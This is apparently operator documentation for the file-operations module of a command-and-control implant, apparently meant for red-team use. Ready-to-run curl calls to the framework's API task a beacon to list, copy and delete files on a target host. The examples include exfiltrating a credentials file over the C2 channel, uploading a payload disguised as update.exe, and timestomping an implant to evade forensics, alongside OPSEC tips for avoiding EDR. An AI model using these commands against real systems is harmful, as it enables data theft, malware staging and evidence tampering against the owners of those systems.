File Operations¶

Commands for file system interaction on the target host. All file operation commands use Win32 APIs directly (no cmd.exe spawning) for minimal OPSEC footprint, unless otherwise noted.

The implant's fileops module handles directory listings, file reads, copies, moves, deletes, uploads, downloads, and drive enumeration through native Windows API calls like CreateFileW, FindFirstFile, CopyFileW, and MoveFileExW.

Command Reference¶

Command	Syntax	Description	OPSEC Impact
`ls`	`ls [path]`	List directory contents	Low
`drives`	`drives`	List available drives	Low
`mkdir`	`mkdir <path>`	Create directory	Low
`cd`	`cd <directory>`	Change working directory	Low
`pwd`	`pwd`	Print working directory	Low
`upload`	`upload <local_file> <remote_path>`	Upload file to target	Medium
`download`	`download <file>`	Download file from target	Medium
`cp`	`cp <src> <dst>`	Copy file	Low
`mv`	`mv <src> <dst>`	Move/rename file	Low
`rm`	`rm <path>`	Delete file or directory	Low
`cat`	`cat <file>`	Read file contents	Low
`timestomp`	`timestomp <target> <reference>`	Copy timestamps between files	Low

Directory and Drive Commands¶

ls¶

List directory contents using FindFirstFile / FindNextFile. Returns formatted output with file sizes and last-modified timestamps. No child processes are spawned.

Task type: fileops (method: ls)

ShellAPI

ls C:\Users\Public

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "ls C:\\Users\\Public"}'

Example output:

 Directory of C:\Users\Public

01/15/2025 09:32    <DIR>    .
01/15/2025 09:32    <DIR>    ..
01/15/2025 09:32    <DIR>    Documents
12/03/2024 14:18    1048576  update.exe
01/10/2025 08:45    2304     readme.txt

Output format

Each entry shows the last-modified timestamp, size (or <DIR> for directories), and filename. The format matches Cobalt Strike's native ls output.

drives¶

List available logical drives and their types using GetLogicalDrives and GetDriveTypeW.

Task type: fileops (method: drives)

ShellAPI

drives

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "drives"}'

Example output:

C:  Fixed
D:  CD-ROM
E:  Network
Z:  Removable

Drive types: Fixed, Removable, Network, CD-ROM, RAM Disk, Unknown.

mkdir¶

Create a directory using CreateDirectory.

Task type: fileops (method: mkdir)

ShellAPI

mkdir C:\Users\Public\staging

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "mkdir C:\\Users\\Public\\staging"}'

cd¶

Change the beacon's working directory. This is a process-level operation using os.Chdir -- it affects subsequent commands that use relative paths.

Task type: Process-level (beacon state)

ShellAPI

cd C:\Users\Public

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "cd C:\\Users\\Public"}'

pwd¶

Print the beacon's current working directory. Uses os.Getwd at the beacon process level.

Task type: Process-level (beacon state)

ShellAPI

pwd

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "pwd"}'

File Transfer Commands¶

upload¶

Upload a file from the operator's machine to the target host. The backend reads the file, base64-encodes it, and dispatches a fileops task with method upload. The implant decodes the content and writes it using CreateFileW / WriteFile with CREATE_ALWAYS disposition.

Task type: fileops (method: upload)

Dedicated endpoint: POST /api/v1/cockpit/file/upload (multipart form)

ShellAPI (multipart)

upload /tmp/payload.exe C:\Users\Public\update.exe

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/upload" \
  -H "Authorization: Bearer $TOKEN" \
  -F "beacon_id=$BEACON_ID" \
  -F "dest_path=C:\Users\Public\update.exe" \
  -F "file=@/tmp/payload.exe"

Chunked upload: Files larger than 512KB are automatically split into chunks. The first chunk uses the fileops upload method (creates the file), and subsequent chunks use PowerShell [IO.File]::OpenWrite to append data. A final verification task computes the SHA256 hash on the target to confirm integrity.

Transfer acceleration: The beacon's sleep interval is temporarily reduced to 1 second during file transfers for faster throughput, then restored to the original value after completion.

OPSEC

Writes a file to disk on the target -- subject to AV/EDR file scanning
Large files generate multiple C2 channel round-trips (visible in network traffic)
Chunked uploads use PowerShell for append operations, which may trigger script logging
MITRE ATT&CK: T1105 (Ingress Tool Transfer)

download¶

Download a file from the target host to the operator. The implant reads the file using CreateFileW / ReadFile and returns the content as base64 over the C2 channel.

Task type: fileops (method: download)

Dedicated endpoint: POST /api/v1/cockpit/file/download

ShellAPI (dedicated endpoint)API (shell command)

download C:\Users\Public\credentials.txt

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/download" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "beacon_id": "'$BEACON_ID'",
    "path": "C:\\Users\\Public\\credentials.txt"
  }'

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "download C:\\Users\\Public\\credentials.txt"}'

Retrieving downloaded content: After the download task completes, fetch the file binary from:

curl -s "https://stentor.app/api/v1/cockpit/file/content/$TASK_ID" \
  -H "Authorization: Bearer $TOKEN" \
  -o credentials.txt

The server decodes the base64 data, verifies the SHA256 hash, persists a download record, and serves the raw binary with Content-Disposition: attachment.

OPSEC

Large files generate significant C2 channel traffic (base64 encoding adds ~33% overhead)
File reads via CreateFileW may trigger EDR file-access telemetry
Transfer acceleration temporarily reduces beacon sleep to 1 second
MITRE ATT&CK: T1041 (Exfiltration Over C2 Channel)

File Manipulation Commands¶

cp¶

Copy a file using CopyFileW. The destination is overwritten if it already exists (bFailIfExists = false).

Task type: fileops (method: cp)

ShellAPI

cp C:\Windows\System32\calc.exe C:\Users\Public\calc.exe

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "cp C:\\Windows\\System32\\calc.exe C:\\Users\\Public\\calc.exe"}'

mv¶

Move or rename a file using MoveFileExW with MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED flags. The destination is overwritten if it already exists.

Task type: fileops (method: mv)

ShellAPI

mv C:\Users\Public\old_name.exe C:\Users\Public\new_name.exe

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "mv C:\\Users\\Public\\old_name.exe C:\\Users\\Public\\new_name.exe"}'

rm¶

Delete a file or directory. Uses DeleteFile for files and RemoveDirectory for directories. Non-empty directories are deleted recursively using FindFirstFile / FindNextFile to enumerate and remove all contents.

Task type: fileops (method: rm)

ShellAPI

rm C:\Users\Public\staging

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "rm C:\\Users\\Public\\staging"}'

OPSEC

File deletions are logged by EDR products monitoring filesystem activity
Recursive directory deletion generates multiple DeleteFile / RemoveDirectory calls
Deleted files may be recoverable from NTFS journal or VSS snapshots

File Inspection Commands¶

cat¶

Read file contents and return them as a string. Opens the file via CreateFileW / ReadFile and returns the raw content (not base64-encoded, unlike download).

Task type: fileops (method: cat)

ShellAPI

cat C:\Users\Public\config.txt

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "cat C:\\Users\\Public\\config.txt"}'

cat vs download

Use cat for quick inspection of small text files -- the content appears directly in the beacon console. Use download for binary files or when you need the file saved locally, as it preserves the exact bytes and verifies integrity via SHA256.

Anti-Forensics¶

timestomp¶

Copy file timestamps from a reference file to a target file using SetFileTime. This modifies the $STANDARD_INFORMATION attribute timestamps (Created, Modified, Accessed) on the target to match the reference file.

Task type: evasion (method: timestomp)

ShellAPI

timestomp C:\Users\Public\implant.exe C:\Windows\System32\notepad.exe

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "timestomp C:\\Users\\Public\\implant.exe C:\\Windows\\System32\\notepad.exe"}'

The first argument is the target file (timestamps to modify) and the second is the reference file (timestamps to copy from). After execution, the target file's Created, Modified, and Accessed times match the reference file.

OPSEC

SetFileTime modifies only the $STANDARD_INFORMATION (SI) attribute in NTFS. The $FILE_NAME (FN) attribute timestamps are maintained by the kernel and cannot be modified via user-mode APIs. Forensic tools like MFTECmd can detect timestomping by comparing SI and FN timestamps -- a mismatch is a strong indicator of tampering.

MITRE ATT&CK: T1070.006 (Indicator Removal: Timestomp)
Detection: SI vs FN timestamp mismatch in MFT analysis, NTFS journal ($UsnJrnl) entries

File Browse API¶

The dedicated file browser endpoint provides structured directory listings for the UI file browser panel.

Endpoint: POST /api/v1/cockpit/file/browse

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/browse" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "beacon_id": "'$BEACON_ID'",
    "path": "C:\\"
  }'

This dispatches a collect task with method dirlist to the beacon, which returns structured directory data for the UI to render as a file tree.

Transfer Management¶

Active Transfers¶

List all in-progress file transfers, optionally filtered by beacon:

curl -s "https://stentor.app/api/v1/cockpit/file/active?beacon_id=$BEACON_ID" \
  -H "Authorization: Bearer $TOKEN"

Cancel Downloads¶

Cancel in-progress downloads matching a wildcard pattern:

ShellAPI

cancel *.exe

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/cancel" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "beacon_id": "'$BEACON_ID'",
    "pattern": "*.exe"
  }'

Win32 API Reference¶

All file operations use Win32 APIs directly through the implant's fileops module. No cmd.exe or PowerShell processes are spawned (except for chunked upload append operations).

Command	Win32 API	MITRE ATT&CK
`ls`	`FindFirstFile` / `FindNextFile`	T1083 (File and Directory Discovery)
`drives`	`GetLogicalDrives` / `GetDriveTypeW`	T1083 (File and Directory Discovery)
`mkdir`	`CreateDirectory`	--
`cd` / `pwd`	`os.Chdir` / `os.Getwd` (Go stdlib)	--
`upload`	`CreateFileW` / `WriteFile`	T1105 (Ingress Tool Transfer)
`download`	`CreateFileW` / `ReadFile`	T1041 (Exfiltration Over C2 Channel)
`cp`	`CopyFileW`	--
`mv`	`MoveFileExW`	--
`rm`	`DeleteFile` / `RemoveDirectory`	T1070.004 (Indicator Removal: File Deletion)
`cat`	`CreateFileW` / `ReadFile`	T1005 (Data from Local System)
`timestomp`	`SetFileTime`	T1070.006 (Indicator Removal: Timestomp)